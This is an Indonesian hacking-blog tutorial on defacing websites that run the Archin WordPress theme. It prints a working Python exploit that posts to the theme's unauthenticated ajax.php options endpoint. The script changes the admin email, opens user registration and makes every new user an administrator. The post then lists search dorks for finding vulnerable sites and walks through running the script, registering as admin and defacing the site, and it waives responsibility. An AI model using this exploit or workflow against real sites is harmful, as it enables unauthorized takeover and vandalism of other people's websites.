Home » CRACKER » DEFACE » HACKING » TIPS AND TRICK » TUTORIAL » Cara Deface Dengan Archin WordPress

Senin, 23 September 2013

Cara Deface Dengan Archin WordPress









YeyeyeLalaalaala Wkwkwk Hey Ketemu Saya Lagi Broo Nihh Ane Mau Nunjukin Deface Dengan Teknik Archin Oke Langsung Saja Om Ke TKP

BAHAN:
-Kopi
-Camilan 
-python (Gk Punya Python Download Di Google Om )

Gw Anggap Lo Sudh Punya Python Langsung Saja Install python

# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "Targetnya Broo"
#path to ajax.php
url = "/wp-content/themes/GantiDengantema/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
   
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"

save filenya dengan berekstensi .py Inget .py Jgn Yg Laen Wkwkwk
lalu cari target website dengan mengunakan dork berikut :

DORK:
/wp-content/themes/*/hades_framework/ 
 /wp-content/themes/felici/hades_framework/ 
 /wp-content/themes/averin/hades_framework/ 
 /wp-content/themes/shotzz/hades_framework/
 /wp-content/themes/KLR/hades_framework/
 /wp-content/themes/yvora/hades_framework/
 /wp-content/themes/ratius/hades_framework/
 /wp-content/themes/dagda/hades_framework/ 
 /wp-content/themes/shopsum/hades_framework/
 /wp-content/themes/ultrici/hades_framework/
 /wp-content/themes/bizniz/hades_framework/
 /wp-content/themes/appius/hades_framework/ 
 /wp-content/themes/majestics/hades_framework/
 /wp-content/themes/candy/hades_framework/
 /wp-content/themes/vithy/hades_framework/ 
 /wp-content/themes/sodales/hades_framework/

 Cari Targetnya Broo Dengan Dork Di Atas

Lalu Coba Buka Misalnya Saya Tadi Pakek Dork /wp-content/themes/yvora/hades_framework/
Berarti Ntar Cek Sitenya Vuln Atau Tdk Dengan Cara http://site/wp-content/themes/yvora/hades_framework/option_panel/ajax.php/
Jika Target Tersebut Blnk/Kosong Berarti Web Berikut Vuln

Setelah Itu Buka Start ~> run ~> cmd
ketik "D:" (karena script yg diatas saya letakkan di local disk D)
ketik lagi "filenya.py" dan pencet enter. sehingga menjadi seperti ini :



Jika Sudah Seperti Itu Tandanya Berhasil Tinggal Register Dehh
http:/site.com/wp-login.php

Jika Sudah Registrasi Password Akan Terkirim Ke Email Tadi Cek Email Kamu Broo



Kalo Sudah Terserah Dehh Lo Apain Webnya Tapi Jgn Tebas Index.phpnya Index.phpnya Rename Aja Ganti Dengn Index.html Hargai Karya Orang

NB : Kami Tidak Bertanggung Jawab Atas Segala Hall Yang Anda Lalukan!!

 Content By : Imron X-GEN

Posted in: ,,,,
Posting Lebih Baru Posting Lama Beranda

0 komentar:

Posting Komentar